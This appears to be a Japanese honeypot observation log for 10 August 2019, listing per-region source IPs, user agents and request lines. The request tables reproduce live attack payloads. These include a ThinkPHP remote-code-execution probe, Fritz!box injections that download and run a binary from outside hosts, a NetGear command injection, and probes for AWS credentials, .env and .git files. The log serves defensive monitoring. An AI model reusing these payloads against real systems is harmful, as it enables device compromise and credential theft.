ハニーポット(仮) 観測記録 2019/08/10分です。
特徴
Region:AP
ThinkPHPの脆弱性を狙うアクセス
123[.]125[.]114[.]144に関する不正通信
を確認しました。
Region:US
AVM Fritz!boxの脆弱性を狙うアクセス
NetGearの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
masscanでのスキャン行為
awsのcredential情報に対するスキャン行為
110[.]249[.]212[.]46に関する不正通信
を確認しました。
Region:EU
特にありませんでした。
他
アクセス数推移
AP:総アクセス数:49 (前日比:-3)
US:総アクセス数:30 (前日比:+13)
EU:総アクセス数:9 (前日比:-119)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
4 | 103.48.192.210 | Vietnam |
1 | 115.192.209.14 | China |
1 | 119.39.46.249 | China |
1 | 123.138.79.106 | China |
1 | 124.88.112.162 | China |
1 | 125.118.6.88 | China |
1 | 125.119.13.160 | China |
1 | 171.12.10.102 | China |
1 | 175.152.31.223 | China |
1 | 175.184.165.103 | China |
1 | 180.95.231.230 | China |
1 | 180.95.238.86 | China |
5 | 185.100.87.245 | Romania |
1 | 220.250.10.34 | China |
1 | 220.250.11.215 | China |
1 | 221.11.60.147 | China |
1 | 221.13.12.238 | China |
1 | 222.94.195.248 | China |
1 | 223.166.74.80 | China |
1 | 27.115.124.70 | China |
1 | 36.32.3.59 | China |
1 | 36.47.160.39 | China |
1 | 37.49.231.15 | Estonia |
1 | 39.98.213.1 | China |
2 | 41.216.186.87 | South Africa |
4 | 42.51.0.34 | China |
1 | 47.111.6.150 | China |
1 | 58.248.202.150 | China |
4 | 59.36.132.222 | China |
1 | 60.13.6.49 | China |
1 | 66.249.70.29 | United States |
3 | 77.247.110.69 | Netherlands |
1 | 84.147.60.170 | Germany |
UserAgent一覧
件数 | UserAgent |
---|---|
6 | - |
2 | curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.1.0zlib/1.2.3 libidn/1.18 libssh2/1.2.2 |
2 | Go-http-client/1.1 |
1 | Mozilla/5.01682558 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/537.36(KHTML, like Gecko) Chrome/40.0.2214.89 Safari/537.36 |
1 | Mozilla/5.01724933 Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E302 |
1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) |
13 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 |
5 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
7 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
6 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
1 | python-requests/2.21.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | CONNECT | cn[.]bing[.]com:443 | HTTP/1.1 |
4 | CONNECT | www[.]baidu[.]com:443 | HTTP/1.1 |
2 | CONNECT | www[.]voanews[.]com:443 | HTTP/1.1 |
1 | GET | ///admin/config.php | HTTP/1.1 |
1 | GET | /evox/about | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /HNAP1 | HTTP/1.1 |
2 | GET | http://boxun[.]com/ | HTTP/1.1 |
2 | GET | http://www[.]123cha[.]com/ | HTTP/1.1 |
2 | GET | http://www[.]baidu[.]com/ | HTTP/1.1 |
2 | GET | http://www[.]epochtimes[.]com/ | HTTP/1.1 |
2 | GET | http://www[.]ip[.]cn/ | HTTP/1.1 |
1 | GET | http://www[.]minghui[.]org/ | HTTP/1.1 |
2 | GET | http://www[.]rfa[.]org/english/ | HTTP/1.1 |
2 | GET | http://www[.]wujieliulan[.]com/ | HTTP/1.1 |
1 | GET | /nmaplowercheck1565349055 | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /server-status | HTTP/1.1 |
2 | GET | /TP/index.php | HTTP/1.1 |
2 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
3 | GET | /TP/public/index.php | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
2 | HEAD | http://123[.]125[.]114[.]144/ | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
2 | HEAD | /robots.txt | HTTP/1.1 |
1 | POST | /sdk | HTTP/1.1 |
2 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
2 | \x03 | ||
1 | \x16\x03\x01 |
Region:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 110.249.212.46 | China |
1 | 172.104.242.173 | United States |
10 | 180.96.12.158 | China |
10 | 183.131.18.172 | China |
1 | 193.169.60.41 | Russia |
1 | 211.38.144.230 | South Korea |
1 | 39.98.213.1 | China |
1 | 41.216.186.87 | South Africa |
1 | 77.247.110.69 | Netherlands |
2 | 89.248.174.144 | Netherlands |
1 | 91.121.209.213 | France |
UserAgent一覧
件数 | UserAgent |
---|---|
7 | - |
2 | Go-http-client/1.1 |
1 | masscan/1.0 (https://github.com/robertdavidgraham/masscan) |
1 | Mozilla/5.0 |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
18 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /.aws/credentials | HTTP/1.0 |
1 | GET | /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20wget%20http://91[.]92[.]66[.]192/xd.sh%20%26 | HTTP/1.1 |
1 | GET | /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%cd%20%2Ftmp%2F%3B%20wget%20http%3A%2F%2F5[.]253[.]86[.]121%2Fbins%2Farm%3B%20chmod%20777%20arm%3B%20.%2Farm%20%26 | HTTP/1.1 |
2 | GET | /elrekt.php | HTTP/1.1 |
2 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
2 | GET | /index.php | HTTP/1.1 |
2 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
2 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
2 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
2 | GET | /TP/html/public/index.php | HTTP/1.1 |
2 | GET | /TP/index.php | HTTP/1.1 |
2 | GET | /TP/public/index.php | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
2 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | \x03 | ||
1 | \x16\x03\x01 |
Region:EU
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
3 | 158.69.192.200 | Canada |
1 | 162.247.74.217 | United States |
1 | 185.63.64.18 | Switzerland |
1 | 211.38.144.230 | South Korea |
1 | 41.216.186.87 | South Africa |
1 | 61.219.11.153 | Taiwan |
1 | 77.247.110.69 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
3 | - |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
1 | Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 |
1 | Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 |
1 | Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 FBSMTWB |
1 | Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.0.4) Gecko/20081029 Firefox/2.0.0.18 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
1 | GET | /.git/index | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
1 | GET | /.o3mJzT | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
1 | \x03 |